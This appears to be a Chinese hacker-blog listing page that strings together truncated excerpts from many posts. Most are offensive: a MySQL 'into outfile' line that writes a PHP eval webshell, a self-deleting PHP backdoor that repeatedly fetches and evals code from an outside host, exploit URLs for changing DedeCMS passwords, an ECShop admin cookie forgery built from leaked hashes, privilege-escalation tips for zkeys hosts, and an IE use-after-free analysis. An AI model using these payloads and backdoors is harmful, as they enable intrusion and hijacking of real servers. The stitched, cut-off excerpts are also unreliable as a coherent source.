黑阔们往往去网吧的时候无法找到文件扩展名选项很伤脑筋 下面的两种办法足矣对付! 找回系统文件夹选项: 方法一:组策略 点击“开始→运行”,在运行对话框中输入“gpedit.msc”命令,点击“确定”按钮后,弹出“组策略”编辑对话框,依次展开“本地计算机策略→用户配置→管理模板→Windows组件→Windows资源管理器”,然后在右侧窗口中找到“从‘工具’菜单删除‘文件夹选项’菜单”选项,鼠标双击打开该选项,在属性对话框中切换到“设置”标签页,你会发现该属性选项已选中了“已启用”单选项,所以屏蔽了“文件夹选项”。这时你只要把该选项设置...
PHP是一种脚本语言,它需要PHP解释器来分析运行PHP文件。当把PHP做为CGI服务Web请求时,它需要被嵌入到某种Web服务器里,最常见的是集成到Apache或IIS里,这就是说,在使用PHP前,你需要安装Apache或IIS,并且正确的配置它们和PHP集成的参数。虽然这种配置已经很规范,文档非常丰富,但我们还是经常在安装Apache和PHP集成时遇到问题,而且,有时候我们只想测试一个简单的PHP特征,不想就为此安装、启动Apache服务。 但据官方文档上说,这个内置的Web服务器只是提供开发测试使用,不推荐使用中生产环境中。因为这个服务器接受处理请求时...
源码: <html> <head> <title> Modoer EXP </title> <meta http-equiv=”Content-Type” content=”text/html; charset=utf-8″ /> </head> <script language=”javascript”> function expstart() { var url = document.forms[0].url.value; if(url != “”){ if(url.search(“http://”) < 0 && url.search(“https://”) < 0){ ...
zkeys 默认网站用户权限很低,大部分exp都用不了,如 iis6 exp 就提示无法设置注册表。 提供我成功过的几个方法(不一定有效): 1、如果目标仅仅是旁站的话可以去注册表查 serv-u 的指定用户密码,注册表地址:HKEY_LOCAL_MACHINESOFTWAREcat softserv-u 2、如果要提权的话可以找找有 winwebmail 没,这个东西有的 zkeys 装了,有的没装,如果找到这东西直接去他目录写个 shell,权限就比之前大了,exp 也能提了。 我碰到的几个都是在 d:winwebmailweb 只要有这东西就好办,可以写 lpk,或者替换里面的 exe 啥的都行。 3、如果有 serv...
set character_set_client='gbk'; set character_set_connection='gbk'; set character_set_database='gbk'; set character_set_results='gbk'; set character_set_server='gbk'; select '<?php eval($_POST[cmd]);?>' into outfile 'd:www网站mm.php';
SQL Injection: 啊D 算是新手必用吧,比较简单,没有特别复杂的界面,一看就懂,批量扫描注入功能不错,配合搜索语法比较适合新手练手 明小子 比啊D多些功能,能够查询旁注,其中有个上传功能蛮不错的 NBSI 这个软件对于SQL server的注入有极高的准确率 Pangolin 俗称穿山甲啊,比较好用的注入工具,虽然大牛们说1.3版以后Pangolin就死了,但是对于小菜来说这个工具还是不错的;针对多种平台,多...
new IE 0day coming-mshtml!CDwnBindInfo object use after free vulnerability – 一个影响IE8及以上版本的0day被国外某网站所披露,它通过挂马方式,针对CFR(Council on Foreign Relations)网站的用户进行定向攻击。 我们在@eromang及@yomuds的帮助下,并对其进行简单分析。我们发现其本质是mshtml!CDwnBindInfo对象释放后重用,引发内存崩溃,通过精心构造堆内存,攻击者可执行任意代码。 0:015> bl 0 e 3dc4ec35 0001 (0001) 0:**** mshtml!CDoc::SetupDwnBindInfoAndBindCtx+0x2c ".echo after init msh...
之前出了几个ecshop漏洞,得到了密码但是都破解不出来,虽然知道后台。 用户密码 admin:d03a7617433c2826976062fec569a434 ecshop 有一个表ecs_shop_config ,里面有hash_code 貌似2.7.2 和2.7.3都是31693422540744c0a6b6da635b7a5a93 那就用之前的admin的密码和hash_code的 放在一起再一次MD5 md5(d03a7617433c2826976062fec569a43431693422540744c0a6b6da635b7a5a93 )=76bb7b55d4d0b8283fd4c01994bce575 这个时候 用可以修改COOKIE的浏览器。修改cookie为 ECSCP[admin_id]=1; ECSCP[admin_pass]=76bb7b55d4d0b8283fd4c01994bce575;EC...
修改密码: /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&a...
概要 当用户试图通过 HTTP 或文件传输协议 (FTP) 访问一台正在运行 Internet 信息服务 (IIS) 的服务器上的内容时,IIS 返回一个表示该请求的状态的数字代码。该状态代码记录在 IIS 日志中,同时也可能在 Web 浏览器或 FTP 客户端显示。状态代码可以指明具体请求是否已成功,还可以揭示请求失败的确切原因。 回到顶端 更多信息 日志文件的位置 在默认状态下,IIS 把它的日志文件放在 %WINDIRSystem32Logfiles 文件夹中。每个万维网 (WWW) 站点和 FTP 站点在该目录下都有一个单独的目录。在默认状态下,每天都会在这些目录...
webshell.php <?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xsser.me/webshel.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5); }; ?> eval.txt file_put_contents('1.txt','hello world '.time()); 使用方式 将 webshel.php 传到服务器之后访问一次他会自删除。但,依然会在后台执行 eval.txt 中的代码。 停止执行 删除或清空 webshel.txt。 缺点 服务器或WEB容器一重启后门就没了。
